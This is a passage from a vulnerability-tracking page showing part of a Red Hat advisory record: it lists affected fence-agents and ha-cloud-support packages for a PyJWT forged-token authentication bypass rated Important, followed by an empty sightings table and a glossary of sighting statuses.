"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-lpar-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-mpath-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-nutanix-ahv-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-openstack-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-openstack-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.aarch64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rhevm-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rsa-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rsb-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-sbd-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-scsi-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-virsh-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-vmware-rest-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-vmware-soap-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-wti-0:4.10.0-110.el9_8.3.noarch",
"AppStream-9.8.0.Z.MAIN.EUS:fence-agents-zvm-0:4.10.0-110.el9_8.3.s390x",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virt-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-cpg-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-cpg-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le",
"AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64",
"AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.